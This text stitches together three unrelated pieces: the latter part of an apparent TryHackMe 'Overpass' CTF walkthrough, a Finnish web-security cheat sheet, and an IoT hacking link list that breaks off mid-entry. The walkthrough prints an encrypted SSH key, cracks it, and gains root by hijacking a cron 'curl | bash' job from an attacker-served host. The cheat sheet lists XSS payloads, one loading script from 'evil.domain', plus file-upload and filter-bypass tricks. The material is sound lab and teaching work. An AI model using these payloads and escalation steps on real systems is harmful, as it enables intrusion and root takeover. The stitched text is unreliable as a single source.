/ 220561 (37.92%)^C [!] Keyboard interrupt detected, terminating. =============================================================== 2020/10/05 17:22:48 Finished =============================================================== ``` - [http://10.10.134.43/admin/](http://10.10.134.43/admin/) - [view-source:http://10.10.134.43/main.js](view-source:http://10.10.134.43/main.js) - [view-source:http://10.10.134.43/login.js](view-source:http://10.10.134.43/login.js) ```js async function login() { const usernameBox = document.querySelector("#username"); const passwordBox = document.querySelector("#password"); const loginStatus = document.querySelector("#loginStatus"); loginStatus.textContent = ""; const creds = { username: usernameBox.value, password: passwordBox.value }; const response = await postData("/api/login", creds); const statusOrCookie = await response.text(); if (statusOrCookie === "Incorrect credentials") { loginStatus.textContent = "Incorrect Credentials"; passwordBox.value = ""; } else { Cookies.set("SessionToken", statusOrCookie); window.location = "/admin"; } } ``` `SessionToken` ![](2020-10-05_17-21.png) ![](2020-10-05_17-22.png) ``` Since you keep forgetting your password, James, I've set up SSH keys for you. If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you. Also, we really need to talk about this "Military Grade" encryption. - Paradox ``` `James` ``` -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,9F85D92F34F42626F13A7493AB48F337 LNu5wQBBz7pKZ3cc4TWlxIUuD/opJi1DVpPa06pwiHHhe8Zjw3/v+xnmtS3O+qiN JHnLS8oUVR6Smosw4pqLGcP3AwKvrzDWtw2ycO7mNdNszwLp3uto7ENdTIbzvJal 73/eUN9kYF0ua9rZC6mwoI2iG6sdlNL4ZqsYY7rrvDxeCZJkgzQGzkB9wKgw1ljT WDyy8qncljugOIf8QrHoo30Gv+dAMfipTSR43FGBZ/Hha4jDykUXP0PvuFyTbVdv BMXmr3xuKkB6I6k/jLjqWcLrhPWS0qRJ718G/u8cqYX3oJmM0Oo3jgoXYXxewGSZ AL5bLQFhZJNGoZ+N5nHOll1OBl1tmsUIRwYK7wT/9kvUiL3rhkBURhVIbj2qiHxR 3KwmS4Dm4AOtoPTIAmVyaKmCWopf6le1+wzZ/UprNCAgeGTlZKX/joruW7ZJuAUf ABbRLLwFVPMgahrBp6vRfNECSxztbFmXPoVwvWRQ98Z+p8MiOoReb7Jfusy6GvZk VfW2gpmkAr8yDQynUukoWexPeDHWiSlg1kRJKrQP7GCupvW/r/Yc1RmNTfzT5eeR OkUOTMqmd3Lj07yELyavlBHrz5FJvzPM3rimRwEsl8GH111D4L5rAKVcusdFcg8P 9BQukWbzVZHbaQtAGVGy0FKJv1WhA+pjTLqwU+c15WF7ENb3Dm5qdUoSSlPzRjze eaPG5O4U9Fq0ZaYPkMlyJCzRVp43De4KKkyO5FQ+xSxce3FW0b63+8REgYirOGcZ 4TBApY+uz34JXe8jElhrKV9xw/7zG2LokKMnljG2YFIApr99nZFVZs1XOFCCkcM8 GFheoT4yFwrXhU1fjQjW/cR0kbhOv7RfV5x7L36x3ZuCfBdlWkt/h2M5nowjcbYn exxOuOdqdazTjrXOyRNyOtYF9WPLhLRHapBAkXzvNSOERB3TJca8ydbKsyasdCGy AIPX52bioBlDhg8DmPApR1C1zRYwT1LEFKt7KKAaogbw3G5raSzB54MQpX6WL+wk 6p7/wOX6WMo1MlkF95M3C7dxPFEspLHfpBxf2qys9MqBsd0rLkXoYR6gpbGbAW58 dPm51MekHD+WeP8oTYGI4PVCS/WF+U90Gty0UmgyI9qfxMVIu1BcmJhzh8gdtT0i n0Lz5pKY+rLxdUaAA9KVwFsdiXnXjHEE1UwnDqqrvgBuvX6Nux+hfgXi9Bsy68qT 8HiUKTEsukcv/IYHK1s+Uw/H5AWtJsFmWQs3bw+Y4iw+YLZomXA4E7yxPXyfWm4K 4FMg3ng0e4/7HRYJSaXLQOKeNwcf/LW5dipO7DmBjVLsC8eyJ8ujeutP/GcA5l6z ylqilOgj4+yiS813kNTjCJOwKRsXg2jKbnRa8b7dSRz7aDZVLpJnEy9bhn6a7WtS 49TxToi53ZB14+ougkL4svJyYYIRuQjrUmierXAdmbYF9wimhmLfelrMcofOHRW2 +hL1kHlTtJZU8Zj2Y2Y3hd6yRNJcIgCDrmLbn9C5M0d7g0h2BlFaJIZOYDS6J6Yk 2cWk/Mln7+OhAApAvDBKVM7/LGR9/sVPceEos6HTfBXbmsiV+eoFzUtujtymv8U7 -----END RSA PRIVATE KEY----- ``` ``` kali@kali:~/CTFs/tryhackme/Overpass$ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.john Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 2 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status james13 (id_rsa) 1g 0:00:00:12 97.36% (ETA: 17:26:53) 0.08312g/s 1162Kp/s 1162Kc/s 1162KC/s 05981839..059815574 Session aborted ``` `james13` ``` kali@kali:~/CTFs/tryhackme/Overpass$ chmod 600 id_rsa kali@kali:~/CTFs/tryhackme/Overpass$ ssh -i id_rsa james@10.10.134.43 ``` 1. Hack the machine and get the flag in user.txt ``` james@overpass-prod:~$ ls todo.txt user.txt james@overpass-prod:~$ cat user.txt thm{65c1aaf000506e56996822c6281e6bf7} james@overpass-prod:~$ ``` `thm{65c1aaf000506e56996822c6281e6bf7}` 2. Escalate your privileges and get the flag in root.txt ``` james@overpass-prod:~$ cat todo.txt To Do: > Update Overpass' Encryption, Muirland has been complaining that it's not strong enough > Write down my password somewhere on a sticky note so that I don't forget it. Wait, we make a password manager. Why don't I just use that? > Test Overpass for macOS, it builds fine but I'm not sure it actually works > Ask Paradox how he got the automated build script working and where the builds go. They're not updating on the website ``` ```go //Secure encryption algorithm from https://socketloop.com/tutorials/golang-rotate-47-caesar-cipher-by-47-characters-example func rot47(input string) string { var result []string for i := range input[:len(input)] { j := int(input[i]) if (j >= 33) && (j <= 126) { result = append(result, string(rune(33+((j+14)%94)))) } else { result = append(result, string(input[i])) } } return strings.Join(result, "") } ``` ```go credsPath, err := homedir.Expand("~/.overpass") ``` ``` james@overpass-prod:~$ cat .overpass ,LQ?2>6QiQ$JDE6>Q[QA2DDQiQD2J5C2H?=J:?8A:4EFC6QN. ``` - [ROT-47 Cipher](https://www.dcode.fr/rot-47-cipher) `[{"name":"System","pass":"saydrawnlyingpicture"}]` ``` kali@kali:~/CTFs/tryhackme/Overpass$ cp /usr/share/linpeas/linpeas.sh . kali@kali:~/CTFs/tryhackme/Overpass$ sudo python3 -m http.server 80 [sudo] password for kali: Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.134.43 - - [05/Oct/2020 17:42:39] "GET /linpeas.sh HTTP/1.1" 200 - ^C Keyboard interrupt received, exiting. kali@kali:~/CTFs/tryhackme/Overpass$ ``` ``` james@overpass-prod:~$ wget 10.8.106.222/linpeas.sh --2020-10-05 15:42:40-- http://10.8.106.222/linpeas.sh Connecting to 10.8.106.222:80... connected. HTTP request sent, awaiting response... 200 OK Length: 289937 (283K) [text/x-sh] Saving to: ‘linpeas.sh’ linpeas.sh 100%[=====>] 283.14K 1.39MB/s in 0.2s 2020-10-05 15:42:40 (1.39 MB/s) - ‘linpeas.sh’ saved [289937/289937] james@overpass-prod:~$ ls linpeas.sh todo.txt user.txt james@overpass-prod:~$ chmod +x linpeas.sh james@overpass-prod:~$ ./linpeas.sh ``` ``` james@overpass-prod:~$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # Update builds from latest code * * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash ``` ``` kali@kali:~/CTFs/tryhackme/Overpass$ mkdir -p www/downloads/src/ kali@kali:~/CTFs/tryhackme/Overpass$ cd www/ kali@kali:~/CTFs/tryhackme/Overpass/www$ echo -n 'chmod +s /bin/bash' > downloads/src/buildscript.sh kali@kali:~/CTFs/tryhackme/Overpass/www$ sudo python3 -m http.server 80 [sudo] password for kali: Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... ``` ``` james@overpass-prod:~$ cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 overpass-prod 10.8.106.222 overpass.thm # The following lines are desirable for IPv6 capable hosts ::1 ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters ``` ``` james@overpass-prod:~$ ls -la /bin/bash -rwsr-sr-x 1 root root 1113504 Jun 6 2019 /bin/bash james@overpass-prod:~$ /bin/bash -p bash-4.4# ls linpeas.log linpeas.sh todo.txt user.txt bash-4.4# cd /root bash-4.4# ls buildStatus builds go root.txt src bash-4.4# cat root.txt thm{7f336f8c359dbac18d54fdd64ea753bb} bash-4.4# ``` `thm{7f336f8c359dbac18d54fdd64ea753bb}`
# Kyber, lyhyt oppimäärä Tästä materiaalipankista saat perustietoa verkkosovelluksen tietoturvasta ja sen testaamisesta. Materiaali on valikoitu ja tiivistetty palvelemaan ensisijaisesti ohjelmistokehittäjiä, jotka haluavat tehdä turvallisia järjestelmiä. Materiaalin tarkoitus on tukea omatoimista penetraatiotestausta järjestelmän laadunvarmistuksessa ja tietoturvallisuuden testaamisessa. HUOM: Muista että tietomurron yrittäminenkin on rangaistava teko! Älä tee luvatonta tietoturvatestausta muiden järjestelmille. # Perusasiat web-sovellusten tietoturvasta Perustiedot ja työkalujen peruskäyttöä koskeva materiaali on koottu erilliseen dokumenttiin: [Perusasiat](perusasiat.md). # Työkalut Työkaluista on erillinen dokumentti: [Työkalut](tyokalut.md) # Materiaalia muualla Ohjelmistosuunnittelijoille on runsaasti materiaalia verkossa turvallisen ohjelmiston suunnittelusta ja toteuttamisesta. Kaikkia hyödyllisiä resursseja ei kannata yrittää listata, mutta tässä on linkkejä joihinkin hyödyllisiin materiaaleihin: * [The Basics of Web Application Security](https://martinfowler.com/articles/web-security-basics.html) * [Microsoft Web App Security Frame](https://msdn.microsoft.com/en-us/library/ff649461.aspx) * [OWASP Architecture Security Cheat Sheet](https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet) * [Web Application Hacker's Handbook 2](https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470) * [Penetration Testing - A Hands-On Intruction](https://www.amazon.com/Penetration-Testing-Hands-Introduction-Hacking/dp/1593275641) * [EdOverflow's Bug Bounty Cheat Sheet](https://github.com/EdOverflow/bugbounty-cheatsheet) # Referenssimateriaali Referenssimateriaali tiivistetyssä muodossa tulostamista varten: [Kybertestauksen cheatsheet](https://github.com/solita/kyberoppi/raw/master/Solita-Cyber-CheatSheet.pdf) ## OWASP Top 10 (2017) [OWASP Top 10](https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project) on lista yleisimmistä verkkosovellusten tietoturva-aukoista. OWASP-sivustolta löytyy lisätietoa aukkojen hyväksikäytöstä hyökkäyksestä ja oikeaoppisesta suojautumisesta sovelluskehittäjille. * A1 - Injection * A2 - Broken Authentication * A3 - Sensitive Data Exposure * A4 - XML External Entities (XXE) * A5 - Broken Access Control * A6 - Security Misconfiguration * A7 - Cross-Site Scripting (XSS) * A8 - Insecure Deserialization * A9 - Using Components with Known Vulnerabilities * A10 - Insufficient Logging & Monitoring ## Autentikoinnin tarkastuslista * Onko tunniste satunnainen, siten että sitä ei voi arvata tai päätellä? * Voiko tunnistetta ohjata hyökkääjän haltuun jotenkin? (HttpOnly ja secure -flagit?) * Voiko käyttäjän puolesta tehdä pyyntöjä sovellukseen? (CSRF-esto käytössä?) * Voiko sovelluksen tarkastusta käyttäjätunnuksesta/salasanasta manipuloida? ## Same-origin policy Kts. [Wikipedian artikkeli](https://en.wikipedia.org/wiki/Same-origin_policy) |URL|Lopputulos|Syy| |--|:---:|---:| |http://www.example.com/dir/page2.html|Ok|Sama protokolla, host ja portti| |http://www.example.com/dir2/other.html|Ok|Sama protokolla, host ja portti| |http://username:password@www.example.com/dir2/other.html|Ok|Sama protokolla, host ja port| |http://www.example.com:81/dir/other.html|Epäonnistuu|Sama protokolla, host, mutta eri portti| |https://www.example.com/dir/other.html|Epäonnistuu|Eri protokolla| |http://en.example.com/dir/other.html|Epäonnistuu|Eri host| |http://example.com/dir/other.html|Epäonnistuu|Eri host (vaaditaan tarkka vastaavuus)| |http://v2.www.example.com/dir/other.html|Epäonnistuu|Eri host (vaaditaan tarkka vastaavuus)| |http://www.example.com:80/dir/other.html|Epäselvä|Portti määritelty. Riippuu selaimesta.| ## File upload Käyttäjältä saatu tiedosto voi sisältää haittaohjelman tai viruksen, tekijänoikeuksia tai muita lakeja loukkaavaa materiaalia ja lisäksi toiminnallisuutena on vaikea suojata tiedostojen käsittelyä täysin oikein. Ison tiedoston lähettäminen voi kaataa sovelluspalvelimen. * Onnistuuko ajettavan skriptin upload? (WebShell-backdoor.php) * ```filename``` attribuutin manipulointi (```*```, ```?```, ```;```, ```../../etc/passwd``` yms) * ```null byte``` (```0x00```) käyttö esim. filename-kentän suojauksen ohittamiseen * ```virus.exe.jpg``` vs. ```virus.jpg``` vs. ```virus.exe``` * ```x.php``` -> ```test.jpg/x.php``` * Ajettavaa koodia formaatin kautta (SVG, DOC, Excel, XML) * ```Content-type``` attribuutin manipulointi * Purettavan ```ZIP, TAR, GZ``` yms. sisällä sopiva polku, esim. ```../../backdoor.php``` * ```PDF``` on myös ZIP ja paljon muuta. * ```imagemagick``` tai muun taustaohjelman hyväksikäyttö * ```CSV``` avattuna Excel-ohjelmassa on vaarallinen. Lisätietoa: * http://georgemauer.net/2017/10/07/csv-injection.html * https://www.owasp.org/index.php/Test_Upload_of_Malicious_Files_(OTG-BUSLOGIC-009) * https://www.acunetix.com/websitesecurity/upload-forms-threat/ ## HTTP headerit |Header|Mikä se on?| Selaintuki | Suositeltava arvo, miksi? | Muuta? | |------|-----------|:-----------:|:----------------------:|------:| X-Content-Type-Options: nosniff|Estää selainta arvaamasta uudelleen MIME-typeä.|Chrome, IE8|kokoelma-hederi.|http://stackoverflow.com/questions/18337630/what-is-x-content-type-options-nosniff| |Content-Type |MIME-type.| | | | |Content-Disposition|Liitetiedostojen erottamiseen sisällöstä, joka näytetään selaimessa.|||Tiedostonimen kanssa on oltava tarkkana.||Keep-Alive| | | | | |X-Frame-Options:SAMEORIGIN| Estää sovelluksen avaamisen frameen mielivaltaisesta domainista.| |SAMEORIGIN, ellei ole erityistä syytä sallia iframeja kaikkialta, estetään ne.|http://en.wikipedia.org/wiki/Clickjacking| |Cookie + secure| Salaa cookien. Toimii vain jos on HTTPS| |https://www.owasp.org/index.php/SecureFlag| |cookie + HTTP Only| Cookien käsittely javascriptilla estetty.| | | https://www.owasp.org/index.php/HttpOnly| |Same-Site|CSRF-esto|Chrome, Opera| lax (strict jossain tapauksissa)|https://www.owasp.org/index.php/SameSite | |Strict-Transport-Security| Ohjeistaa selainta käyttämään aina HTTPS:ää. Ignoroidaan HTTP:tä käytettäessä.|Muut kuin IE||http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security| |Cache-Control|IE:n kanssa monenlaisia ongelmia luvassa. Voi toimia myös eri tavalla HTTPS-protokollassa.| | | | |X-XSS-Protection|Ehdottaa selaimelle, että sisällössä voi olla potentiaalisesti XSS sisältöä.|IE, Chrome, Safari| 1 (jos sivulla näytetään käyttäjän sisältöä), selain voi tämän perusteella käynnistää XSS filtterinsä.|OWASP-ZAP antaa low-tason varoituksen tämän puuttumisesta.| |X-Forwarded-For|Reverse proxy asettaa tämän. Tätä ei pitäisi hyväksyä käyttäjän selaimelta, koska se voi aiheuttaa ongelmia.| | Vastaava myös x-forwarded-host| |Content-Security-Policy|Voi asettaa rajoituksia sille mitä sisältöä selain voi ladata.| | | Katso https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy| |Access-Control-Allow-Origin|Mahdollistaa same-origin policyn kiertämisen (CORS)|* poistaa rajoituksen kokonaan, ei hyvä idea.| | |https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS | |Upgrade-Insecure-Requests|Käytetään HTTPS-protokollaa HTTP:n sijaan automaattisesti.|muut paitsi IE|1|https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Upgrade-Insecure-Requests| Yksityiskohtia selainten tarjoamasta tuesta: [Can I Use?](http://www.caniuse.com/#compare=ie+11,edge+16,firefox+58,chrome+64,safari+11,opera+49&compare_cats=Security) ## Enkoodaukset Eri tilanteissa web-sovellukset enkoodaavat sisältöä eri tavoilla. Erilaisten suodattimien ja tarkistusten ohittaminen edellyttää joskus erilaisten enkoodausten hyväksikäyttöä. Tässä on yhteenveto ja esimerkkejä. * normaali: ```alert(1)``` * Javascript, Octal: ```\141\154\145\162\164\50\61\51``` * HTML, hex: ```&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;``` * HTML, decimal: ```&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;``` * Javascript,HEX: ```\x61\x6c\x65\x72\x74\x28\x31\x29``` * Javascript, unicode ```\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029``` * Javascript, Unicode ```\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}\u{0028}\u{0031}\u{0029}``` * URL: ```%61%6c%65%72%74%28%31%29``` * Base64 ### Javascript, puolipiste-enkoodauksen ohitus Myös tämä on sallittu tapa enkoodata asioita joskus. ``` &#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041 ``` Lisätietoa: * Javascriptin enkoodaukset: https://mathiasbynens.be/notes/javascript-escapes * HTML enkoodaukset: https://mathiasbynens.be/notes/ambiguous-ampersands * Erikoismerkit verkko-osoitteissa: [Punycode](https://en.wikipedia.org/wiki/Punycode) ## Javascriptin ajaminen Javascriptin ujuttamiseen ajoon on useita eri tapoja jos sovelluksessa on huolimattomuuden takia jonkinlainen XSS-aukko tai muu ongelma. Tässä on listattu joitakin: * ```<svg/onload=alert(1)>``` SVG-kuvaformaatin hyväksikäyttö + event handler. * ```<script>alert(1)</script>``` * ```<script src="http://evil.domain/hak.js"/>``` * Viallinen HTML, esim. ```<scr<script>ipt>alert('XSS')</scr<script>ipt>``` * ```<img src="lol.jpg" onError=alert(1)>``` * onLoad, onChange yms. vastaavasti * ```<img src=x onerror=alert('XSS')//``` - kommentin hyväksikäyttö * ```<img src=x:alert(alt) onerror=eval(src) alt=xss>``` * ```<svg/onload=alert(1)>``` SVG-kuvaformaatin hyväksikäyttö + event handler. * ```<svg id=alert(1) onload=eval(id)>``` * ```<input autofocus onfocus=alert(1)>``` * ```<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">``` * XML-dokumentin sisällä (CDATA ja muita keinoja) * SVG-kuvan käyttö alustana (CDATA + script) * JSON-rakenteen sisällä * lainausmerkit voi jättää pois tai korvata heittomerkillä. Jossain tilanteissa myös käänteisellä heittomerkillä. Lisätietoa: * https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot * https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection * https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet * https://html5sec.org/ ## Erikoiset URL:t Selaimet tunnistavat useita URL-osoitteita, jotka eivät ole normaaleja verkko-osoitteita ja niitä voidaan hyötykäyttää. Riippuu selaimen ja tietokoneen asetuksista mitä kaikkea voidaan tehdä, mutta tässä on joitakin esimerkkejä. * data:text/html - esimerkiksi ```data:text/html,<script>alert(1)</script>``` * ```javascript:alert(1)``` * Base64-enkoodauksen hyväksikäyttö: ```data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+``` * ```mailto:``` -sähköpostin lähetys * ```callto:``` -puhelinsoitto (esimerkiksi maksulliseen numeroon) * ```tel:``` - puhelinsoitto (esimerkiksi maksulliseen numeroon) * ```file://``` - tiedostojärjestelmä paikallisen koneen levyllä Data-tyyppistä "verkko-osoitetta" voidaan käyttää myös dynaamisesti kuvien tai äänen muodostamiseen verkkosivulla jos HTML-koodissa osoitetaan datasisältö sen avulla. Lisätietoa: * https://github.com/ouspg/urlhandlers * Data-URL määrittelevä RFC: https://tools.ietf.org/html/rfc2397 ## Parametrien käsittelyn rikkominen Parametrien käsittelyssä tehdyt ohjelmointivirheet ovat yleinen tapa hyödyntää sovelluksen virhettä. Tässä on esimerkkejä asioista joita voit kokeilla. * Parametrin jättäminen pois * Arvon korvaaminen (jonkun muun id, -1, tms..) * Saman parametrin toistaminen useita kertoja eri arvoilla, [HTTP Parameter Pollution](https://www.owasp.org/index.php/Testing_for_HTTP_Parameter_pollution_(OTG-INPVAL-004)) * Erikoisarvot: ```null```, ```nil```, ```NaN```, lukualueiden ääriarvot * Erikoismerkit: ```'```, ```%``` ja muut * Arvojen lisääminen pyynnön mukana. Hyväksyykö sovellus myös ylimääräisiä kenttiä? * Ylipitkän arvon käyttö. * välilyöntien käyttö alussa tai lopussa ## Piilotetut elementit käyttöliittymässä * ```form``` elementin hidden-kentät. * CSS-tyylien kautta piilotetut * Position avulla piilotus # Lisenssi ![lisenssi](88x31.png) Creative Commons, Attribution-NonCommercial CC BY-NC Kts. [LISENSSI](LICENSE).
# IoT Resources ## OWASP Resources - [OWASP Internet of Things Project](https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project) - [OWASP IoT Testing Guides](https://www.owasp.org/index.php/IoT_Testing_Guides) ## IoT Hacking Communities - [IoT Village](https://www.iotvillage.org/) - [BuildItSecure.ly](http://builditsecure.ly/) - [Secure Internet of Things Project (Stanford)](http://iot.stanford.edu/people.html) ## Training Available Through ICS-CERT - https://ics-cert.us-cert.gov/Training-Available-Through-ICS-CERT ## Interesting Blogs - <http://iotpentest.com/> - <https://blog.attify.com> - <https://payatu.com/blog/> - <http://jcjc-dev.com/> - <https://w00tsec.blogspot.in/> - <http://www.devttys0.com/> - <https://www.rtl-sdr.com/> - <https://keenlab.tencent.com/en/> - <https://courk.cc/> - <https://iotsecuritywiki.com/> - <https://cybergibbons.com/> - <http://firmware.re/> ## CTFs Related to IoT's and Embedded Devices - <https://github.com/hackgnar/ble_ctf> - <https://www.microcorruption.com/> - <https://github.com/Riscure/Rhme-2016> - <https://github.com/Riscure/Rhme-2017> ## YouTube Channels for Embedded hacking - [Liveoverflow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) - [Binary Adventure](https://www.youtube.com/channel/UCSLlgiYtOXZnYPba_W4bHqQ) - [EEVBlog](https://www.youtube.com/user/EEVblog) - [JackkTutorials](https://www.youtube.com/channel/UC64x_rKHxY113KMWmprLBPA) - [Craig Smith](https://www.youtube.com/channel/UCxC8G4Oeed4N0-GVeDdFoSA) ## Reverse Enginnering Tools - [IDA Pro](https://www.youtube.com/watch?v=fgMl0Uqiey8) - [GDB](https://www.youtube.com/watch?v=fgMl0Uqiey8) - [Radare2](https://radare.gitbooks.io/radare2book/content/) ## MQTT - [Introduction](https://www.hivemq.com/blog/mqtt-essentials-part-1-introducing-mqtt) - [Hacking the IoT with MQTT](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b) - [thoughts about using IoT MQTT for V2V and Connected Car from CES 2014](https://mobilebit.wordpress.com/tag/mqtt/) - [Nmap](https://nmap.org/nsedoc/lib/mqtt.html) - [The Seven Best MQTT Client Tools](https://www.hivemq.com/blog/seven-best-mqtt-client-tools) - [A Guide to MQTT by Hacking a Doorbell to send Push Notifications](https://youtu.be/J_BAXVSVPVI) ## CoAP - [Introduction](http://coap.technology/) - [CoAP client Tools](http://coap.technology/tools.html) - [CoAP Pentest Tools](https://bitbucket.org/aseemjakhar/expliot_framework) - [Nmap](https://nmap.org/nsedoc/lib/coap.html) ## Automobile - [Introduction and protocol Overview](https://www.youtube.com/watch?v=FqLDpHsxvf8) - [PENTESTING VEHICLES WITH CANTOOLZ](https://www.blackhat.com/docs/eu-16/materials/eu-16-Sintsov-Pen-Testing-Vehicles-With-Cantoolz.pdf) - [Building a Car Hacking Development Workbench: Part1](https://blog.rapid7.com/2017/07/11/building-a-car-hacking-development-workbench-part-1/) - [CANToolz - Black-box CAN network analysis framework](https://github.com/CANToolz/CANToolz) ## Radio IoT Protocols Overview - [Understanding Radio](https://www.taitradioacademy.com/lessons/introduction-to-radio-communications-principals/) - [Signal Processing]() - [Software Defined Radio](https://www.allaboutcircuits.com/technical-articles/introduction-to-software-defined-radio/) - [Gnuradio](https://wiki.gnuradio.org/index.php/Guided_Tutorial_GRC#Tutorial:_GNU_Radio_Companion) - [Creating a flow graph](https://blog.didierstevens.com/2017/09/19/quickpost-creating-a-simple-flow-graph-with-gnu-radio-companion/) - [Analysing radio signals](https://www.rtl-sdr.com/analyzing-433-mhz-transmitters-rtl-sdr/) - [Recording specific radio signal](https://www.rtl-sdr.com/freqwatch-rtl-sdr-frequency-scanner-recorder/) - [Replay Attacks](https://www.rtl-sdr.com/tutorial-replay-attacks-with-an-rtl-sdr-raspberry-pi-and-rpitx/) ## Base transceiver station (BTS) - [what is base tranceiver station](https://en.wikipedia.org/wiki/Base_transceiver_station) - [How to Build Your Own Rogue GSM BTS](https://www.evilsocket.net/2016/03/31/how-to-build-your-own-rogue-gsm-bts-for-fun-and-profit/) ## GSM & SS7 Pentesting - [Introduction to GSM Security](http://www.pentestingexperts.com/introduction-to-gsm-security/) - [GSM Security 2](https://www.ehacking.net/2011/02/gsm-security-2.html) - [vulnerabilities in GSM security with USRP B200](https://ieeexplore.ieee.org/document/7581461/) - [Security Testing 4G (LTE) Networks](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-44con-lte-presentation-2012-09-11.pdf) - [Case Study of SS7/SIGTRAN Assessment](https://nullcon.net/website/archives/pdf/goa-2017/case-study-of-SS7-sigtran.pdf) - [Telecom Signaling Exploitation Framework - SS7, GTP, Diameter & SIP](https://github.com/SigPloiter/SigPloit) - [ss7MAPer – A SS7 pen testing toolkit](https://n0where.net/ss7-pentesting-toolkit-ss7maper) - [Introduction to SIGTRAN and SIGTRAN Licensing](https://www.youtube.com/watch?v=XUY6pyoRKsg) - [SS7 Network Architecture](https://youtu.be/pg47dDUL1T0) - [Introduction to SS7 Signaling](https://www.patton.com/whitepapers/Intro_to_SS7_Tutorial.pdf) ## Zigbee & Zwave - [Introduction and protocol Overview](http://www.informit.com/articles/article.aspx?p=1409785) - [Hacking Zigbee Devices with Attify Zigbee Framework](https://blog.attify.com/hack-iot-devices-zigbee-sniffing-exploitation/) - [Hands-on with RZUSBstick](https://uk.rs-online.com/web/p/radio-frequency-development-kits/6962415/) - [ZigBee & Z-Wave Security Brief](http://www.riverloopsecurity.com/blog/2018/05/zigbee-zwave-part1/) ## BLE - [Traffic Engineering in a Bluetooth Piconet](http://www.diva-portal.org/smash/get/diva2:833159/FULLTEXT01.pdf) - [BLE Characteristics](https://devzone.nordicsemi.com/tutorials/b/bluetooth-low-energy/posts/ble-characteristics-a-beginners-tutorial0) Reconnaissance (Active and Passive) with HCI Tools - [btproxy](https://github.com/conorpp/btproxy) - [hcitool & bluez](https://www.pcsuggest.com/linux-bluetooth-setup-hcitool-bluez) - [Testing With GATT Tool](https://www.jaredwolff.com/blog/get-started-with-bluetooth-low-energy/) - [Cracking encryption](https://github.com/mikeryan/crackle) ## Mobile security (Android & iOS) - [Android](https://www.packtpub.com/hardware-and-creative/learning-pentesting-android-devices) - [Android Pentest Video Course](https://www.youtube.com/watch?v=zHknRia3I6s&list=PLWPirh4EWFpESLreb04c4eZoCvJQJrC6H) - [IOS Pentesting](https://web.securityinnovation.com/hubfs/iOS%20Hacking%20Guide.pdf?) ## ARM - [Azeria Labs](https://azeria-labs.com/) - [ARM EXPLOITATION FOR IoT](https://www.exploit-db.com/docs/english/43906-arm-exploitation-for-iot.pdf) ## Firmware Pentest - [Firmware analysis and reversing](https://www.youtube.com/watch?v=G0NNBloGIvs) - [Firmware emulation with QEMU](https://www.youtube.com/watch?v=G0NNBloGIvs) - [Dumping Firmware using Buspirate](http://iotpentest.com/tag/pulling-firmware/) ## IoT hardware Overview - [IoT Hardware Guide](https://www.postscapes.com/internet-of-things-hardware/) ## Hardware Tools - [Bus Pirate](https://www.sparkfun.com/products/12942) - [EEPROM readers](https://www.ebay.com/bhp/eeprom-reader) - [Jtagulator / Jtagenum](https://www.adafruit.com/product/1550) - [Logic Analyzer](https://www.saleae.com/) - [The Shikra](https://int3.cc/products/the-shikra) - [FaceDancer21 (USB Emulator/USB Fuzzer)](https://int3.cc/products/facedancer21) - [RfCat](https://int3.cc/products/rfcat) - [IoT Exploitation Learning Kit](https://www.attify.com/attify-store/iot-exploitation-learning-kit) - [Hak5Gear- Hak5FieldKits](https://hakshop.com/) - [Ultra-Mini Bluetooth CSR 4.0 USB Dongle 